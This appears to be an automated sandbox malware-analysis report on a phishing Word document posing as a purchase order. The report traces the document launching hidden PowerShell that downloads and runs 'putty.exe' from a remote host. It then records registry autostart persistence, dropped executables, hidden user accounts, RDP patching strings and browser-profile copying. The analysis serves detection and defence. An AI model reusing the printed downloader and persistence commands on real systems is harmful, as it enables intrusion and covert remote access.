        Source: NEW PO1100372954 -.docReversingLabs: Detection: 23%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: unknownProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32
        Source: C:\ProgramData\images.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp

        Data Obfuscation:

        barindex
        Suspicious powershell command line foundShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_00207735 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002077E1 push cs; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002084E1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_00206CC1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_006A0E32 push 00000000h; retn 0010h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00287735 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_002877E1 push cs; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_002884E1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00286CC1 push esp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004011C0 push eax; ret
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004011C0 push eax; ret
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041C225 pushad ; retn 0041h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004174D1 push ebp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00417570 push ebp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004011C0 push eax; ret
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004011C0 push eax; ret
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041C225 pushad ; retn 0041h
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004174D1 push ebp; retf
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00417570 push ebp; retf
        Source: C:\ProgramData\images.exeCode function: 17_2_00147735 push esp; retf
        Source: C:\ProgramData\images.exeCode function: 17_2_00146CC1 push esp; retf
        Source: C:\ProgramData\images.exeCode function: 17_2_001477E1 push cs; retf
        Source: C:\ProgramData\images.exeCode function: 17_2_001484E1 push esp; retf
        Source: C:\ProgramData\images.exeCode function: 21_3_042A5220 push eax; ret
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288

        Persistence and Installation Behavior:

        barindex
        Tries to download and execute files (via powershell)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\ProgramData\images.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\ProgramData\images.exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

        Boot Survival:

        barindex
        Creates an undocumented autostart registry key Show sources
        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load
        Source: C:\ProgramData\images.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Contains functionality to hide user accountsShow sources
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
